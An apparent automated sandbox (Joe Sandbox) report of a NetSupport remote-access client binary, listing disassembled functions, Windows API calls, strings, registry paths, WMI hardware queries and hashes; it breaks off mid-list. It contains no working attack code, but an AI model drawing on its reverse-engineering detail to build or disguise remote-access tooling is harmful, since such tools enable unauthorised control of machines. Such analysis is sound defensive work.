Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreateDeleteSelect$BitmapErrorExitLastMessageProcessRelease_free_mallocwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2152670842-2830328467
Opcode ID: a992970416ae98f5764fdb88d940cebc96354c4d0f2882b7071d2e963891bf7d
Instruction ID: 3850b8ccd8beb0e98ab4cbe1f7b01c035796fd6338f527faacd148ed971815aa
Opcode Fuzzy Hash: a992970416ae98f5764fdb88d940cebc96354c4d0f2882b7071d2e963891bf7d
Instruction Fuzzy Hash: D0B1F7B5A00B019FD364CF29C984AD7B7E5FB88359F10892EE5AE97351DB30B941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1105F200 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 368COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1105F251
wsprintfA.USER32 ref: 1105F265

Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,775EC740,?,?,1105F29C,80000001), ref: 110ED59B

Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C

wsprintfA.USER32 ref: 1105F5D6

Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4

Strings

General\ProductId, xrefs: 1105F30B, 1105F32B, 1105F3F1, 1105F6A9
%s\%s, xrefs: 1105F245, 1105F25F
Software\Productive Computer Insight, xrefs: 1105F238, 1105F5C5
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1105F3D1, 1105F434, 1105F47B, 1105F4C5, 1105F4FC, 1105F689, 1105F6D6
NetSupport School Pro, xrefs: 1105F330, 1105F493
Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList, xrefs: 1105F5D0
ConfigList, xrefs: 1105F2E7, 1105F36C, 1105F628
IsA(), xrefs: 1105F3D6, 1105F439, 1105F480, 1105F4CA, 1105F501, 1105F68E, 1105F6DB
NetSupport School, xrefs: 1105F310, 1105F44C, 1105F4A5
Software\NetSupport Ltd, xrefs: 1105F254

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 273891520-33395967
Opcode ID: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
Opcode Fuzzy Hash: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1100D3A1

Strings

CannotLoadDll, xrefs: 1100D350
StillInstances, xrefs: 1100D38F
NoCapClients, xrefs: 1100D373
AlreadyStopped, xrefs: 1100D36C
NotFound, xrefs: 1100D37A
AlreadyStarted, xrefs: 1100D365
Unknown error %d, xrefs: 1100D397
BadParam, xrefs: 1100D381
Exception, xrefs: 1100D388, 1100D396
RequiresVista, xrefs: 1100D349
DllInitFailed, xrefs: 1100D357
CannotGetFunc, xrefs: 1100D35E

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
API String ID: 2111968516-2092292787
Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5

Uniqueness

Uniqueness Score: -1.00%

Function 11016500 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 154windowtimethreadCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 1101653C
IsWindowVisible.USER32 ref: 11016549
GetWindow.USER32(?,00000004), ref: 11016556
IsWindowVisible.USER32 ref: 11016561
GetClassNameA.USER32(?,?,00000020), ref: 11016576
SendMessageTimeoutA.USER32(?,0000000D,000000C8,?,00000002,00000064,?), ref: 110165DF
GetWindowThreadProcessId.USER32(?,?), ref: 11016604
DeleteObject.GDI32(00000000), ref: 1101665F

Strings

NSMWControl32, xrefs: 110165A4, 110165A9
NSSWControl32, xrefs: 1101659D
Progman, xrefs: 1101657F

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Visible$ClassDeleteMessageNameObjectProcessRectSendThreadTimeout
String ID: NSMWControl32$NSSWControl32$Progman
API String ID: 3572104470-975155618
Opcode ID: 9bedd5b8189153278156204b9e6d124ffaee7c4ea08e56ad7d15a7ae3b8edffa
Instruction ID: e961a916bbbcfe8b57c7ffd2e482cea40bc41dda2ab4819b6da64e7ff7338971
Opcode Fuzzy Hash: 9bedd5b8189153278156204b9e6d124ffaee7c4ea08e56ad7d15a7ae3b8edffa
Instruction Fuzzy Hash: AE514175D102299FDB54DF64CC84BEDB7B4BF49304F0041A9E519E7284EB74AA84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 110762B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(111EE708,0CBC1010,1110FB6D,00000000,00000000,00000000,E8111B71,111834F3,000000FF,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000), ref: 110762FE

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

InitializeCriticalSection.KERNEL32(0000000C,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,0CBC1010,00000000,00000001,00000000,00000000,1118B138,000000FF), ref: 11076367
InitializeCriticalSection.KERNEL32(00000024,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,0CBC1010,00000000,00000001,00000000,00000000,1118B138,000000FF), ref: 1107636D
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,0CBC1010,00000000,00000001,00000000,00000000), ref: 11076377
InitializeCriticalSection.KERNEL32(000004D0,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,0CBC1010,00000000,00000001,00000000,00000000), ref: 110763CC
InitializeCriticalSection.KERNEL32(000004F8,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,0CBC1010,00000000,00000001,00000000,00000000), ref: 110763D5

Strings

*TraceRecv, xrefs: 11076457
General, xrefs: 1107644B
_debug, xrefs: 11076475, 1107648F
*TraceSend, xrefs: 11076481
*MaxRxPending, xrefs: 11076446

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$CreateEvent__wcstoi64
String ID: *MaxRxPending$*TraceRecv$*TraceSend$General$_debug
API String ID: 4263422321-2298398812
Opcode ID: 5f9da48c200581db7dfb1f76df1280596932817b8542f0b7c543bdced2a80419
Instruction ID: 06ccc5540fe39e817025fd6f1a9fd6d6e0fa44080d25a9a2500616ed5f0e287a
Opcode Fuzzy Hash: 5f9da48c200581db7dfb1f76df1280596932817b8542f0b7c543bdced2a80419
Instruction Fuzzy Hash: F651DF75A002859FDB11CF65CC84B9ABBE8FF84304F0485BAED599F245DB71A904CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1105E670 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 130windowregistryCOMMON

Download Yara Rule

APIs

RegisterClassA.USER32 ref: 1105E6D2

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

CreateWindowExA.USER32 ref: 1105E713
SetPropA.USER32 ref: 1105E79D
GetMessageA.USER32 ref: 1105E7C0
TranslateMessage.USER32(?), ref: 1105E7D6
DispatchMessageA.USER32 ref: 1105E7DC

Strings

CobrowseProxy::RunCobrowse, xrefs: 1105E69A
_bOK, xrefs: 1105E6E9
CobrowseProxy.cpp, xrefs: 1105E6E4, 1105E725
NSMCobrProxy, xrefs: 1105E6C8, 1105E70C, 1105E797
m_hAppWin, xrefs: 1105E72A

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
API String ID: 13347155-1383313024
Opcode ID: 09d15215d0e1b795ccbd3063e429a4a78244eb3c839fe8a5b0ef160dfd830d6d
Instruction ID: 935ceeef8014da56787e0eecf891f9bbedf7255f62cfcfd3cf10a2167a67f8da
Opcode Fuzzy Hash: 09d15215d0e1b795ccbd3063e429a4a78244eb3c839fe8a5b0ef160dfd830d6d
Instruction Fuzzy Hash: DD410BB9E41766ABD750CFA5DD80F9BFBA4EB48708F008529F55697280F730A800CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 111242E0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

GetVersionExA.KERNEL32(?,View,*NoHideFEP,00000000,00000000,00000001), ref: 1112433F
InterlockedExchange.KERNEL32(111F19B4,00000001), ref: 11124365
CreateWindowExA.USER32 ref: 111243AB
SetWindowLongA.USER32 ref: 111243CB
SetFocus.USER32(00000000), ref: 111243E2
SetWindowLongA.USER32 ref: 111243FC
DestroyWindow.USER32(00000000), ref: 11124412
InterlockedExchange.KERNEL32(111F19B4,00000000), ref: 11124429

Strings

*NoHideFEP, xrefs: 1112430B
button, xrefs: 111243A5
View, xrefs: 11124310

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ExchangeInterlockedLong$CreateDestroyFocusVersion__wcstoi64
String ID: *NoHideFEP$View$button
API String ID: 1610953178-1502386645
Opcode ID: e43f5421bed03823a56e05d7f4c9847f0409737411aad5fb0ff072603cd7047e
Instruction ID: e7f43078c421523e46d189802bbe7ea8140fa8570dcc46dc3c934ff96bec0ddb
Opcode Fuzzy Hash: e43f5421bed03823a56e05d7f4c9847f0409737411aad5fb0ff072603cd7047e
Instruction Fuzzy Hash: 4831C134686266EFE724CF61DEC4B66FBB8BB0530DF940228F92593984EB70A504CB50

Uniqueness

Uniqueness Score: -1.00%

Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON

Download Yara Rule

APIs

CreateSolidBrush.GDI32(?), ref: 1100306D
GetStockObject.GDI32(00000007), ref: 11003089
SelectObject.GDI32(?,00000000), ref: 1100309A
SelectObject.GDI32(?,?), ref: 110030A7
InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
GetSysColor.USER32(00000004), ref: 110030EB
SetBkColor.GDI32(?,00000000), ref: 110030F6
Rectangle.GDI32(?,?,?,?,?), ref: 11003110
SelectObject.GDI32(?,?), ref: 1100311E
SelectObject.GDI32(?,?), ref: 11003128
DeleteObject.GDI32(?), ref: 1100312E

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
String ID:
API String ID: 4121194973-0
Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1115E1C0 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 221COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 1115E209
_GetWMIStringW@16.PCICL32(WIN32_COMPUTERSYSTEM,Manufacturer,?,?), ref: 1115E240
_GetWMIStringW@16.PCICL32(WIN32_BIOS,SerialNumber,?,00000190), ref: 1115E271

Part of subcall function 1115CB10: VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 1115CC16
Part of subcall function 1115CB10: SysStringByteLen.OLEAUT32(?), ref: 1115CC21

_GetWMIStringW@16.PCICL32(WIN32_COMPUTERSYSTEM,Model,?,00000190), ref: 1115E29D

Part of subcall function 1115CB10: VariantClear.OLEAUT32(?), ref: 1115CC77

Part of subcall function 1115E030: GetVersion.KERNEL32(0CBC1010,00000200,?,00000000), ref: 1115E109
Part of subcall function 1115E030: LoadLibraryA.KERNEL32(Kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1118DF70), ref: 1115E11F
Part of subcall function 1115E030: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1118DF70,000000FF), ref: 1115E15E
Part of subcall function 1115E030: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1115E16D

CoUninitialize.OLE32(?,?), ref: 1115E40C

Strings

WIN32_BIOS, xrefs: 1115E25F
Manufacturer, xrefs: 1115E223
SerialNumber, xrefs: 1115E253
Model, xrefs: 1115E284
WIN32_COMPUTERSYSTEM, xrefs: 1115E22A, 1115E28B

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: String$W@16$Variant$AddressByteChangeClearCurrentInitializeLibraryLoadProcProcessTypeUninitializeVersion
String ID: Manufacturer$Model$SerialNumber$WIN32_BIOS$WIN32_COMPUTERSYSTEM
API String ID: 2067617366-2593075894
Opcode ID: beb2fcb448fe295f069a9ec20503f75de2a7f20ed0f2a3741b8c9f2ca039c381
Instruction ID: de8382077fbff84d74303e479e4b973ce33806f731c4cd1374107ce91e1596db
Opcode Fuzzy Hash: beb2fcb448fe295f069a9ec20503f75de2a7f20ed0f2a3741b8c9f2ca039c381
Instruction Fuzzy Hash: 3A8181B9E012289FEB91CF50CC50BEBFB79EB56708F0081D9E45997240EB756A84CF52

Uniqueness

Uniqueness Score: -1.00%

Function 110D84D0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018915,0CBC1010,?,?,?,1117EE88,000000FF), ref: 110DEB61

__CxxThrowException@8.LIBCMT ref: 110D8550

Part of subcall function 111634B1: RaiseException.KERNEL32(?,?,11110E64,?,?,?,?,?,11110E64,?,111CD988), ref: 111634F3

gethostbyname.WSOCK32(?,0CBC1010,00000000,?,00000000), ref: 110D8565
WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11187A70,000000FF), ref: 110D8571
_memmove.LIBCMT ref: 110D859B
htons.WSOCK32(00000000), ref: 110D85C1
socket.WSOCK32(00000002,00000001,00000000), ref: 110D85D1
WSAGetLastError.WSOCK32 ref: 110D85DF
connect.WSOCK32(?,?,00000010,?,00000000,000000FF,?,00000000,000000FF), ref: 110D8613
WSAGetLastError.WSOCK32 ref: 110D861E

Part of subcall function 110E08D0: OutputDebugStringA.KERNEL32(?,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,?,00000000,000000FF,0CBC1010,?,00000000,00000000,?,?,?,00000000,11188D0B), ref: 110E0983
Part of subcall function 110E08D0: OutputDebugStringA.KERNEL32(1119F2E8,?,?,?,00000000,11188D0B,000000FF,?,110DDF63,?,Invalid Server paramters), ref: 110E098A

Strings

Connect() the socket is not closed, xrefs: 110D851D

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
